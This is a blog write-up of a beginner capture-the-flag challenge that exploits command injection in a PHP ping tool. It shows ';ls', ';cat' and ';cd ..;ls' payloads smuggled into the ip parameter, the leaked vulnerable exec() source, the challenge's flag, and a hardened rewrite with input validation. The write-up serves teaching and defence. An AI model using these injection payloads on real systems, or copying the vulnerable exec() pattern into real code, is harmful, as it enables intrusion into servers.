Ryan CTF is a nicely organized beginner CTF located at http://ctf.ryanic.com/. Challenges are pretty interesting, with the only thing I disliked being that they are played through a web shell. So let’s start:

(Ab)use the ping-tool.html page on the web server http://ctf.ryanic.com:8080 to find the flag within the Flag.txt file.

When we open the site, we see just a simple form asking us for the IP we want to ping. Parameters are passed in a GET request, so if we wanted to ping Google's DNS our URL would look like

http://ctf.ryanic.com:8080/ping-tool.php?ip=8.8.8.8

Now one of the basic things to try (as hinted by the challenge name) is command injection, which we can test by appending ;ls and checking the results:

PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=51 time=1.08 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=51 time=0.493 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=51 time=0.399 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=51 time=0.418 ms

--- 8.8.8.8 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3042ms
rtt min/avg/max/mdev = 0.399/0.598/1.085/0.284 ms
index.php
logo.png
ping-tool.html
ping-tool.php
secret.html
test.txt
x.txt

Now, for fun, we can also leak the source of the .php script running on the server with

http://ctf.ryanic.com:8080/ping-tool.php?ip=8.8.8.8;cat+ping-tool.php

Here it is important to note that we need to URL-encode the parameters; in the case above, for example, the space is replaced by +.

And we get:

<?php
$out = array();
// The value of the "ip" parameter is concatenated straight into the shell
// command, so a ";" in it starts a second command (the injection point).
exec("ping -c 4 " . $_GET["ip"], $out);
foreach ($out as $line) {
    echo "$line\n";
}
?>
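As an added example (not the CTF's code), here is the leaked handler rewritten in its hardened form: the real fix is to check that `ip` is actually an IP address before it ever reaches exec(), with escapeshellarg() as a second layer. The function names are my own.

```php
<?php
// Added example (not the CTF's own code): a hardened version of ping-tool.php.
// The original is exploitable because $_GET["ip"] is concatenated straight into
// a shell command, so ";" in the value starts a second command.

// Accept only a literal IPv4/IPv6 address; returns null for anything else,
// including payloads such as "8.8.8.8;cat ping-tool.php".
function validate_ip_target(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Build the ping command. Validation is the primary control; escapeshellarg()
// is defence in depth so a validation slip still cannot break out of the argument.
function build_ping_command(string $input): ?string
{
    $ip = validate_ip_target($input);
    if ($ip === null) {
        return null;
    }
    return 'ping -c 4 ' . escapeshellarg($ip);
}

// Request handler mirroring the original page, minus the injection.
function handle_request(array $get): array
{
    $cmd = build_ping_command($get['ip'] ?? '');
    if ($cmd === null) {
        http_response_code(400);
        return ['error: invalid IP address'];
    }
    $out = [];
    exec($cmd, $out);
    return $out;
}

// Constructed inputs: the legitimate request from the writeup, the payload used
// to leak the source, and an IPv6 address with surrounding whitespace.
$probes = ['8.8.8.8', '8.8.8.8;cat ping-tool.php', ' 2001:4860:4860::8888 '];
foreach ($probes as $probe) {
    $cmd = build_ping_command($probe);
    printf("%-32s -> %s\n", var_export($probe, true), $cmd ?? 'REJECTED');
}
```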

Now for the remaining part: we need to find the flag. We can do this through the browser alone, but it is easier through Burp, which is also a good tool to know.

We need to capture one of the requests we send to the server and forward it to Repeater; this way we can quickly modify the request parameters and URL-encode them. For this we just need to start Burp, turn Intercept on and set the browser to use a proxy (for Burp this is localhost on port 8080 by default).

First I tried running find for the flag, which failed for some reason, so I decided to simply check the directories around our current one.

[Image: ping ls]

The request parameters, once URL-decoded, are simply ;cd ..;ls. It seems we were in luck, since Flag.txt sits in the parent directory. We simply cat Flag.txt and that's it.

Flag: pluripresence

- F3real